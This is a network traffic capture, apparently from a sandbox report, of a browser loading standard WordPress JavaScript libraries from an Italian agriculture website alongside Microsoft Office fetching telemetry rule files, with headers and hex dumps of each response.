                                                                                                                                          2024-11-28 10:33:07 UTC597OUTGET /wp-content/plugins/tailor/assets/js/dist/vendor/shuffle.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:07 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:07 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 14308
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:07 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:07 UTC7876INData Raw: 2f 2a 21 20 53 68 75 66 66 6c 65 2e 6a 73 20 33 2e 31 2e 31 20 2d 20 4d 49 54 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 2c 22 6d 6f 64 65 72 6e 69 7a 72 22 5d 2c 61 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 2c 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 29 3a 77 69 6e 64 6f 77 2e 53 68 75 66 66 6c 65 3d 61 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 29 7d 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c
                                                                                                                                          Data Ascii: /*! Shuffle.js 3.1.1 - MIT */!function(a){"function"==typeof define&&define.amd?define(["jquery","modernizr"],a):"object"==typeof exports?module.exports=a(require("jquery"),window.Modernizr):window.Shuffle=a(window.jQuery,window.Modernizr)}(function(a,b,
                                                                                                                                          2024-11-28 10:33:07 UTC6432INData Raw: 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 61 28 62 29 2c 65 3d 64 2e 64 61 74 61 28 29 2c 66 3d 65 2e 70 6f 69 6e 74 2c 67 3d 65 2e 73 63 61 6c 65 2c 68 3d 7b 77 69 64 74 68 3a 45 2e 5f 67 65 74 4f 75 74 65 72 57 69 64 74 68 28 62 2c 21 30 29 2c 68 65 69 67 68 74 3a 45 2e 5f 67 65 74 4f 75 74 65 72 48 65 69 67 68 74 28 62 2c 21 30 29 7d 2c 69 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 50 6f 73 69 74 69 6f 6e 28 68 29 3b 41 2e 65 71 75 61 6c 73 28 66 2c 69 29 26 26 67 3d 3d 3d 78 7c 7c 28 65 2e 70 6f 69 6e 74 3d 69 2c 65 2e 73 63 61 6c 65 3d 78 2c 74 68 69 73 2e 73 74 79 6c 65 51 75 65 75 65 2e 70 75 73 68 28 7b 24 69 74 65 6d 3a 64 2c 70 6f 69 6e 74 3a 69 2c 73 63 61 6c 65 3a 78 2c 6f 70 61 63 69 74 79 3a 63 3f 30 3a 31 2c 73 6b 69 70 54 72 61 6e 73 69 74
                                                                                                                                          Data Ascii: on(b,c){var d=a(b),e=d.data(),f=e.point,g=e.scale,h={width:E._getOuterWidth(b,!0),height:E._getOuterHeight(b,!0)},i=this._getItemPosition(h);A.equals(f,i)&&g===x||(e.point=i,e.scale=x,this.styleQueue.push({$item:d,point:i,scale:x,opacity:c?0:1,skipTransit


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          93192.168.2.44985913.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:07 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:07 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 464
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                          ETag: "0x8DC582B97FB6C3C"
                                                                                                                                          x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103307Z-174f7845968glpgnhC1EWR7uec0000000ybg00000000agm7
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:07 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          94192.168.2.44985413.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:07 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:07 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 469
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                          ETag: "0x8DC582BBA701121"
                                                                                                                                          x-ms-request-id: 614103fc-b01e-003e-0d68-408e41000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103307Z-174f78459684bddphC1EWRbht40000000y1000000000564k
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:08 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          95192.168.2.44985813.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:07 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:07 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 477
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                          ETag: "0x8DC582BB8CEAC16"
                                                                                                                                          x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103307Z-174f78459685726chC1EWRsnbg0000000ydg0000000028w0
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:08 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          96192.168.2.4498605.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:08 UTC397OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:09 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:08 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 14 Dec 2020 09:46:17 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 11224
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:08 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:09 UTC7876INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                                          Data Ascii: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                                          2024-11-28 10:33:09 UTC3348INData Raw: 26 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 6e 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 75 28 22 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2e 2e 2e 29 20 63 61 6c 6c 65 64 20 61 66 74 65 72 20 6c 6f 61 64 20 65 76 65 6e 74 20 6f 63 63 75 72 72 65 64 22 29 2c 48 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 73 2e 65 61 63 68 28 5b 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 65 72 72 6f 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 2e 66 6e 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 3b 72 65 74 75 72 6e 22 6c 6f 61 64 22 3d 3d
                                                                                                                                          Data Ascii: &"complete"===n.document.readyState&&u("jQuery(window).on('load'...) called after load event occurred"),H.apply(this,arguments)},s.each(["load","unload","error"],function(e,t){s.fn[t]=function(){var e=Array.prototype.slice.call(arguments,0);return"load"==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          97192.168.2.44986113.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:08 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:08 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 494
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                          ETag: "0x8DC582BB7010D66"
                                                                                                                                          x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103308Z-174f7845968kdththC1EWRzvxn0000000asg000000000bw9
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:08 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          98192.168.2.4498625.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:08 UTC604OUTGET /wp-content/plugins/tailor/assets/js/dist/vendor/magnific-popup.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:09 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:09 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 21185
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:09 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:09 UTC7876INData Raw: 2f 2a 21 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 76 31 2e 30 2e 31 20 7c 20 68 74 74 70 3a 2f 2f 64 69 6d 73 65 6d 65 6e 6f 76 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2f 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 61 29 3a 61 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 3a 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 7c 7c 77 69 6e 64 6f 77 2e 5a 65 70 74 6f 29 7d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 3d 22
                                                                                                                                          Data Ascii: /*! Magnific Popup v1.0.1 | http://dimsemenov.com/plugins/magnific-popup/ */!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="
                                                                                                                                          2024-11-28 10:33:09 UTC8000INData Raw: 68 69 73 2e 62 67 4f 76 65 72 6c 61 79 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 61 29 2c 62 2e 77 72 61 70 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 61 29 7d 2c 5f 68 61 73 53 63 72 6f 6c 6c 42 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 62 2e 69 73 49 45 37 3f 64 2e 68 65 69 67 68 74 28 29 3a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 29 3e 28 61 7c 7c 76 2e 68 65 69 67 68 74 28 29 29 7d 2c 5f 73 65 74 46 6f 63 75 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 28 62 2e 73 74 2e 66 6f 63 75 73 3f 62 2e 63 6f 6e 74 65 6e 74 2e 66 69 6e 64 28 62 2e 73 74 2e 66 6f 63 75 73 29 2e 65 71 28 30 29 3a 62 2e 77 72 61 70 29 2e 66 6f 63 75 73 28 29 7d 2c 5f 6f 6e 46 6f 63 75 73 49 6e 3a 66 75 6e 63 74 69 6f 6e 28 63 29 7b
                                                                                                                                          Data Ascii: his.bgOverlay.removeClass(a),b.wrap.removeClass(a)},_hasScrollBar:function(a){return(b.isIE7?d.height():document.body.scrollHeight)>(a||v.height())},_setFocus:function(){(b.st.focus?b.content.find(b.st.focus).eq(0):b.wrap).focus()},_onFocusIn:function(c){
                                                                                                                                          2024-11-28 10:33:09 UTC5309INData Raw: 3d 63 3f 62 2e 63 75 72 72 49 74 65 6d 2e 69 6d 67 3a 62 2e 73 74 2e 7a 6f 6f 6d 2e 6f 70 65 6e 65 72 28 62 2e 63 75 72 72 49 74 65 6d 2e 65 6c 7c 7c 62 2e 63 75 72 72 49 74 65 6d 29 3b 76 61 72 20 65 3d 64 2e 6f 66 66 73 65 74 28 29 2c 66 3d 70 61 72 73 65 49 6e 74 28 64 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 74 6f 70 22 29 2c 31 30 29 2c 67 3d 70 61 72 73 65 49 6e 74 28 64 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 22 29 2c 31 30 29 3b 65 2e 74 6f 70 2d 3d 61 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2d 66 3b 76 61 72 20 68 3d 7b 77 69 64 74 68 3a 64 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 28 75 3f 64 2e 69 6e 6e 65 72 48 65 69 67 68 74 28 29 3a 64 5b 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68 74 29 2d 67 2d
                                                                                                                                          Data Ascii: =c?b.currItem.img:b.st.zoom.opener(b.currItem.el||b.currItem);var e=d.offset(),f=parseInt(d.css("padding-top"),10),g=parseInt(d.css("padding-bottom"),10);e.top-=a(window).scrollTop()-f;var h={width:d.width(),height:(u?d.innerHeight():d[0].offsetHeight)-g-


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          99192.168.2.4498645.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:09 UTC568OUTGET /wp-includes/js/underscore.min.js?ver=1.13.4 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:09 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:09 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 28 Mar 2023 12:34:43 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 18833
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:09 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
